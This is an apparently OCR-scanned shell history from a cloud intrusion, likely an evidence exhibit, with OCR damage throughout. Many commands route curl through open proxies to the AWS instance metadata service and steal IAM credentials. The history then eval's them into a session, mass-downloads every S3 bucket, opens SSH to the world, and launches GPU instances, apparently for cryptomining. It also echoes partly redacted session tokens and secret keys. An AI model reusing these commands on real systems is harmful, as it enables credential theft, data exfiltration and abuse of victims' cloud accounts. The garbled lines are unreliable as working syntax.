6785 aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
       90d3 -- security-group-ids sg-
                                       4f2d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name us-east-1
6786 aws ec2 run-instances --region us-east-1 --instance-type p3.8xlarge --count 2 --image-id
        0d3 --security-group-ids sg- 4f2d --associate-public-ip-address
ami-
--instance-initiated-shutdown-behavior terminate --key-name us-east-1
```

```
6787 aws ec2 run-instances --region us-east-1 --instance-type p3.2xlarge --count 2 --image-id
ami-
        0d3 --security-group-ids sg- 4f2d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name us-east-1
6788 aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
6802 mv
                                   aws scan
6803 mv
                                                aws scan
6804 mv ami-id.tar aws scan
6807 mv deploy.sh aws scan
                     .docker.repos aws_scan
6809 mv
6812 mv
                        aws scan
6836 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.0.19.1:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               l awssession.sh `
6837 eval curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.55.114.26:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                         awssession.sh `
6840 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.55.114.26:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               | awssession.sh `
6841 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.168.25.243:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               l awssession.sh
6843 eval curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://35.168.25.243:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
              awssession.sh `
6846 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.228.22.143:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               | awssession.sh
6847 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir=''
                                                                                               '' \; mkdir
-p \"\dir\)\" '&&' cd \"\dir\)\" '&&' aws s3 sync s3://{} .
6855 aws --profile pbn --region us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel
                      '' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
--verbose dir='
 6856 aws --protile
                        iam list-users
```

```
ec2 describe-instances --region us-east-1
6858 aws --profile
6859 aws --profile
                        --region us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel
                     "' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
--verbose dir='"
6879 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.88.84.246:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/l
                        awssession.sh
6880 aws s3api list-buckets | less
6881 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.32.45.175:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
               | awssession.sh `
6882 aws --profile pbn2 --region us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel
                      '' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
--verbose dir='
6883 aws us-east-1 s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='
               ' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
                                                                                                  "' \;
6884 aws soapi list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
mkdir -p \" \dir \) \" \&\  cd \" \dir \) \" \&\  aws s3 sync s3://{} .
6885 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.231.76.6:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
               l awssession.sh `
๒๖୪५ evai curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.88.164.158:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                          awssession.sh `
6890 eval curl -vvv --tail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.52.27.18:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
              | awssession.sh `
6891 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.15.95.51:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                  | awssession.sh `
6892 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/
                                                                                      awssessions.h`
6893 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/
                                                                                      awssessions.sh`
6894 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/
                                                                                     l awssession.sh`
6895 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout z --proxy
https://34.253.64.237:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
```

```
6911 cat ../aws scan/miner/setup.sh
6922 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://13.58.150.135:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                         awssession.sh`
                                                                                                       "' \;
6923 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
mkdir -p \" \dir \) \" \end{array} \ .
                                                                                                     \; mkdir
6924 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
-p \"\dir\)\" '&&' cd \"$\dir\}\" '&&' aws s3 sync s3://{} .
 6975 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.27.111.81:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 6976 aws ec2 create-key-pair
 6977 aws ec2 create-key-pair --key-name default2
 6979 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                    b864 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
 6980 aws ec2 create-key-pair --region us-west-2 --key-name default
6984 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami.
                 8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
 6985 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
                 8109 -- associate-public-ip-address -- security-group-ids sg-
ami
                                                                                  2864
--instance-initiated-shutdown-behavior terminate --key-name default
6986 aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
ami.
                 8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
7001 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.209.220.55:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7003 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.240.191.55:443
                                                                                              awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials
 7005 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.87.29.1:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
 7008 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.3.78.44:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
```

```
7011 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.59.52.123:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7012 aws ec2 describe-instances
7014 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.203.180.4:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                      awssession.sh`
7015 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.203.180.4:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                       awssession.sh`\n
7016 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
                                                                                                     '\;
mkdir -p \" \dir \) " \&\  cd \" \dir \) " \&\  aws s3 sync s3://{} .
7019 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.226.250.30:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                        awssession.sh`
7021 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://35.161.180.197:80
                                                                                           awssession.sh`
http://169.254.169.254/latest/meta-data/iam/security-credentials/
7023 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.153.227.199:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7025 curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.153.227.199:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                          awssession.sh
7028 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://3.104.68.8:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7030 curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.104.68.8:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
7032 aws sts get-caller-identity | less
7033 aws ec2 create-key-pair
7035 curl `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.113.12.133:80 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7036 aws ec2 describe-instances --region ap-northeast-2
7037 aws ec2 describe-instances --region ap-northeast-1
7039 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.82.117.18:80
```

```
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                     awssession.sh`
                                                                                                     "' \;
7040 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
mkdir -p \" \dir \) " \&\  cd \" \dir \) " \&\  aws s3 sync s3://{} .
7043 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.77.46.101:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7044 aws ec2 create-key-pai --key-name default
7045 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.214.49.137:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7047 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://54.214.49.137:443 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh `
7052 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.15.95.51:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7093 cat ~/.local/bin/awssession.sh
7094 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"
mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws
7095 ls /mnt/export/aws dumps
7116 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.229.79.123:8118 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7119 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.229.79.123:8118 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7120 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.36.188.73:8088
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                         awssession.sh`
7122 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.36.188.73:8088 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7124 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.52.44.117:80
http://169.254.169.254/latest/meta-data/iam/security-credentials
awsession.sh`
7127 echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-17T19:41:57Z",\n "Type" :
                                                                                                       n\ ر
                                YBRV",\n "SecretAccessKey":
"AccessKevId" :
```

```
2M5b",\n "Token":
"AgoJb3JpZ2luX2VjEFwaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAN75KyRB1x+RsQdbSzk+OV2Hz5tInN2/TwtJk3lLBdvnAiEAvbjzP+o7sJ
iSghExyN8Mqwjtm+7wwMTkRxMj0XpknYMq5AMINRAAGgw3MTUxMjA5MTQ1NTMiDF997W8bZO41X4r3ByrBA42tYbiA/tPlYsVajj6uJCfz5
cW/BgPBUnLD0x90XcwRkt7ew9WNfqczodCLd8bsHJM/OhfIvt3edmn8c5Wb0D374XUZMrvrnomWJgFHqZE/iCleWLt51bbv08dYhTtuMYBj
@RZL8M7LfEZ1AHwt1AVxBwXsmZceHV9eT5/H+1s+8JOC3R1ZkiSDWOD5IYorrfelRko4Dqpm1OclJb37yDvBjVEmRUkUF6GPyyyEqn6u5gK
waPLOgJhRVtdipq0WRBvLZZuW3hONoel+4h44PFITx8m/brBt5SpDIrma3xL7GDKf3iJx1g4N0KZCpJfaQy8Q3ZV8poqf3+PHouMo2Sn6yd
k/KadM0T+WK+Eh9L2656JAhfDHfNYIFe+cV0txg2OcUoiaW4+O27Ka0U1wLHXhUeosEAS/nAoPUN4drveSCjo0AtBv/TMan2bCBG6bBOEBf
1VQNI0pwSE+55sHONF6Jy41Mkv2TZVC9pFHUyNHSQpRA0rF+LtE4KWSkzY9t1EhZbz6+6wv47aS0tIjUWsEcrroaY5uTMB/e7Ug+BRTL715
5w8KIZayrm3hSXYwf7IRU0xdn0573GayLwqq6u7rMK6D3uUFOrMBsBQJaVOP+SIgdH9AdjoaQuitcuizIg8dIT8r7QU7+KG+WJrEk8NYFsU
6dFi+8vf/SbxOtZTi25qine32/YVo/16V4IU0PgX5cRDXyfm8jjNMn0zMYnjnzPSZOtHSaoNMFN0HtYqSA8mp5g17qGB3P10S160/ORFvMb
AG394dm/fuY7w5qqjbI6yDDtUdBeq2p+EDJg3D+HQphhnd+3P1/9D3LP2MZKLDxkY3YOmOs3cUxT0=",\n "Expiration":
"2019-04-18T02:06:22Z"\n* Connection #0 to host 52.79.227.180 left intact\n}' | awssession.sh
7128 echo -e '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-17T19:41:57Z",\n "Type" :
         ",\n "AccessKeyId" : "
                                               YBRV",\n "SecretAccessKey":
                                    D2M5b",\n
                                              "Token" :
"AgoJb3JpZ2luX2VjEFwaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAN75KyRB1x+RsQdbSzk+OV2Hz5tInN2/TwtJk3lLBdvnAiEAvbjzP+o7sJ
iSghExyN8Mqwjtm+7wwMTkRxMj0XpknYMq5AMINRAAGgw3MTUxMjA5MTQ1NTMiDF997W8bZO41X4r3ByrBA42tYbiA/tPlYsVajj6uJCfz5
cW/BgPBUnLD0x90XcwRkt7ew9WNfqczodCLd8bsHJM/OhfIvt3edmn8c5Wb0D374XUZMrvrnomWJgFHqZE/iCleWLt51bbv08dYhTtuMYBj
@RZL8M7LfEZ1AHwt1AVxBwXsmZceHV9eT5/H+1s+8JQC3R1ZkiSDWOD5IYorrfelRko4Dqpm1OclJb37yDvBjVEmRUkUF6GPyyyEqn6u5gK
waPLOgJhRVtdipq0WRBvLZZuW3hONoel+4h44PFITx8m/brBt5SpDIrma3xL7GDKf3iJx1g4N0KZCpJfaQy8Q3ZV8poqf3+PHouMo2Sn6yd
k/KadM0T+WK+Eh9L2656JAhfDHfNYIFe+cV0txg2QcUoiaW4+Q27Ka0U1wLHXhUeosEAS/nAoPUN4drveSCjo0AtBv/TMan2bCBG6bBQEBf
1VONIOpwSE+55sHONF6Jy41Mkv2TZVC9pFHUyNHSOpRAOrF+LtE4KWSkzY9t1EhZbz6+6wv47aSOtIjUWsEcrroaY5uTMB/e7Ug+BRTL715
5w8KIZayrm3hSXYwf7IRU0xdn0573GayLwqq6u7rMK6D3uUFOrMBsBQJaVOP+SIgdH9AdjoaQuitcuizIg8dIT8r7QU7+KG+WJrEk8NYFsU
6dFi+8vf/SbxOtZTi25qine32/YVo/16V4IU0PgX5cRDXyfm8jjNMn0zMYnjnzPSZOtHSaoNMFN0HtYqSA8mp5g17qGB3P10S160/ORFvMb
AG394dm/fuY7w5qqjbI6yDDtUdBeq2p+EDJg3D+HQphhnd+3P1/9D3LP2MZKLDxkY3YOmOs3cUxT0=",\n "Expiration":
"2019-04-18T02:06:22Z"\n* Connection #0 to host 52.79.227.180 left intact\n}' | awssession.sh
7130 echo -e '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-17T19:41:57Z",\n "Type" :
                                               YBRV",\n "SecretAccessKev":
         ",\n "AccessKeyId" : "
                                    2M5b",\n "Token":
"AgoJb3JpZ2luX2VjEFwaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAN75KyRB1x+RsQdbSzk+OV2Hz5tInN2/TwtJk3lLBdvnAiEAvbjzP+o7sJ
iSghExyN8Mgwjtm+7wwMTkRxMj0XpknYMg5AMINRAAGgw3MTUxMjA5MTO1NTMiDF997W8bZO41X4r3ByrBA42tYbiA/tPlYsVajj6uJCfz5
cW/BgPBUnLD0x90XcwRkt7ew9WNfqczodCLd8bsHJM/OhfIvt3edmn8c5WbOD374XUZMrvrnomWJgFHqZE/iCleWLt51bbv08dYhTtuMYBj
@RZL8M7LfEZ1AHwt1AVxBwXsmZceHV9eT5/H+1s+8JQC3R1ZkiSDWOD5IYorrfelRko4Dqpm1OclJb37yDvBjVEmRUkUF6GPyyyEqn6u5gK
waPLOgJhRVtdipq0WRBvLZZuW3hONoel+4h44PFITx8m/brBt5SpDIrma3xL7GDKf3iJx1g4N0KZCpJfaQy8Q3ZV8poqf3+PHouMo2Sn6yd
k/KadM0T+WK+Eh9L2656JAhfDHfNYIFe+cV0txg2QcUoiaW4+Q27Ka0U1wLHXhUeosEAS/nAoPUN4drveSCjo0AtBv/TMan2bCBG6bBQEBf
1VQNI0pwSE+55sHONF6Jy41Mkv2TZVC9pFHUyNHSQpRA0rF+LtE4KWSkzY9t1EhZbz6+6wv47aS0tIjUWsEcrroaY5uTMB/e7Ug+BRTL715
5w8KIZayrm3hSXYwf7IRU0xdn0573GayLwqq6u7rMK6D3uUFOrMBsBQJaVOP+SIgdH9AdjoaQuitcuizIg8dIT8r7QU7+KG+WJrEk8NYFsU
6dFi+8vf/SbxOtZTi25qine32/YVo/16V4IU0PgX5cRDXyfm8jjNMn0zMYnjnzPSZOtHSaoNMFN0HtYqSA8mp5g17qGB3P10S160/ORFvMb
AG394dm/fuY7w5qqjbI6yDDtUdBeq2p+EDJg3D+HOphhnd+3P1/9D3LP2MZKLDxkY3YOmOs3cUxT0=",\n "Expiration":
```

```
"2019-04-18T02:06:22Z"\n}' | awssession.sh
7135 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.212.222.66:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
7163 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.74.132.51:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                 awssession.sh`
/164 eval curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.232.182.109:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
| awssession.sh`
7166 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.229.66.72:8000 http://169.254.169.254/latest/meta-data/iam/
awssession.sh`
7180 echo '{\n__"Code" : "Success",\n "LastUpdated" : "2019-04-18T04:20:05Z",\n "Type" : "
                                                                                                       ',\n
                                 TWNQ",\n "SecretAccessKey":
"AccessKeyId" :
                                    N5E0",\n "Token":
"AgoJb3JpZ2luX2VjEGQaCXVzLWVhc3QtMiJHMEUCICTtShXrc7bJBHFceALuXMVTeACjAdk2vgkAg0fhe2k+AiEAmWLrJ1QhMUw0VvsxDx
ST4y9XDrLHo3c9Z57MoircQTcq2gMIPRABGgwwNzQ1ODkzMTg2MTciDDOU7/idpyXdUTVUliq3A8mMwkOTtcvk80nyi6C9sz/IdpzpCdqOl
lAs2S4a1W2aR6cCS7ORy7i7KKwu2CL/8loMeZ1wbWBl5e8c/vSV8Cv3YaNmUYTD9tt37qGet8zgKfeJ7Anmct1I6+etTHFKhDOSipbkZGRe
qHqMw9YJimpt5jRLott2DB+770TjYUWnsHHolMWOcAASvs8A41wRDwAchMkHQu37SguxZtSxX8aVQVwpNZe4j/u3A0NMuPbPcIESSl/cQ+y
EFIH8IBETW/1/vp7exjDNDmAgt/Cm/OX2IsWX5KOMmhRViFoiN3mgDRkMOKKeH0Lv6Z4A8S6G3ZzuLv4l2cdOn05gta9j7HJOhsc9U5PtL/
XXtpOs7Sv+hDLJ0682v3hAeZ/FdPrJ7gVfGCDKhwAkMKo6fxX4kUW+cbekbvJw9zBoIKcOXvAB6gS7kM6M9/bR+r52LfoxMeMn/YNaFOCnD
supZ/795WNJHMrUxsYR1GAGGzp33IJVAIIbGS4ySDdtP+n9PBMbw9oZT2Y5Qway1K1nYdiSR8tF7wLsUytrDCgstxQ6AJcZOPYzRTL5P52J
gl4Hr3PE6FdP5mGye6swzfXf5QU6tAE7vdu1emaTASFFTTExxoN9hYWv7yFkm8xupFd08fx7e0CDeACTaoVn3qAJH1yXX+v1YFnZny6a7Iy
qo484Bc5kQUOeTNwazyStEyV/rKgJEsrWmAKS9fbX7HWl0KPHxsT7yt8NMtr1CCHU+U1CoH0r73ubTJSrk/5FOLFmkKgFmBWdPiSFwKhp5k
BtMZAFNeSHtxJTO+F+MuQoDDdzGuGb7wdDy5pYs4MVyASoR71GEAMPSWg=",\n "Expiration": "2019-04-18T10:23:09Z"\n\n}'
awssession.sh
7193 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                            awssession.sh`
7273 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.232.127.99:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                     | awssession.sh`
7274 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.183.173.34:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                            awssession.sh`
7275 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.79.116.117:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                         awssession.sh`
7276 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 594c --protocol tcp --port 22 --cidr
```

```
0.0.0.0/0 --region eu-west-2
7277 aws ec2 create-key-pair --key-name default --region eu-west-2
7281 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
                 6eab --key-name default --associate-public-ip-address --security-group-ids sg-
ami-
                                                                                                   594c
--instance-snutdown-behavior terminate
7282 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-
                 6eab --key-name default --associate-public-ip-address --security-group-ids sg-
                                                                                                   594c
--instance-initiated-shutdown-behavior terminate
7283 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
                 5eab --key-name default --associate-public-ip-address --security-group-ids sg-
ami
                                                                                                   594c
--instance-initiated-shutdown-behavior terminate
7284 aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 2 --image-id
                 beab --key-name default --associate-public-ip-address --security-group-ids sg-
                                                                                                   594c
--instance-initiated-shutdown-behavior terminate
7285 aws ec2 describe-instances --region eu-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
7295 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.180.135.146:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                       | awssession.sh`
7296 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.59.198.77:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                         awssession.sh`
7297 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.59.198.77:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                        l awssession.sh`
7298 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.59.198.77:8080
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                              awssession.sh`
7299 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.183.173.34:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                          awssession.sh`
7300 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.196.188.120:8081
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                   l awssession.sh`
7301 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                  99f6 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
7305 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami
                 8109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
7306 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
                 8109 --associate-public-ip-address --security-group-ids sg
ami
                                                                                99f6
--instance-initiated-shutdown-behavior terminate --key-name default
7307 aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
                 3109 --associate-public-ip-address --security-group-ids sg-
ami
                                                                                99f6
```

```
--instance-initiated-shutdown-behavior terminate --kev-name default
7319 eval `curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.180.135.146:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                 awssession.sh`
7320 aws ec2 create-key-pair --key-namedefault
7321 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.180.135.146:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7323 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.180.135.146:8000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                   awssession.sh`
7324 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.180.135.146:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7325 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.190.198.139:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                           awssession.sh`
7326 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://18.185.100.2:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7327 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://18.185.100.2:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7328 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.13.50.158:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7329 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.13.50.158:8000 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
7330 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.31.167.74:8080 http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
                                                                 f23e --protocol tcp --port 22 --cidr
7331 aws ec2 authorize-security-group-ingress --group-id sg
0.0.0.0/0 --region us-west-2
7334 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
                 8109 --associate-public-ip-address --security-group-ids sg-
ami
--instance-initiated-shutdown-behavior terminate --key-name default
7335 aws ec2 describe-vpcs
7336 aws ec2 describe-vpcs --region us-west-2
7337 aws ec2 create-vpc --region us-west-2
```

```
7338 aws ec2 create-vpc --region us-west-2 --cidr-block 10.0.0.0/16
7339 aws ec2 create-security-group --group-name defaultsg-
                                                               f23e --vpc-id vpc
                                                                                               20ae
--region us-west-2
7340 aws ec2 create-security-group --group-name defaultsg-
                                                                F23e --vpc-id vpc-
                                                                                               20ae
--region us-west-2 --description default
                                                                           7023 --protocol tcp --port 22
7341 aws ec2 authorize-security-group-ingress --group-id sg-
--cidr 0.0.0.0/0 --region us-west-2
7342 aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-
                 3109 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
7343 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                           5076 --protocol tcp --port 22
--cidr 0.0.0.0/0 --region us-west-2
7344 aws ec2 run-instances
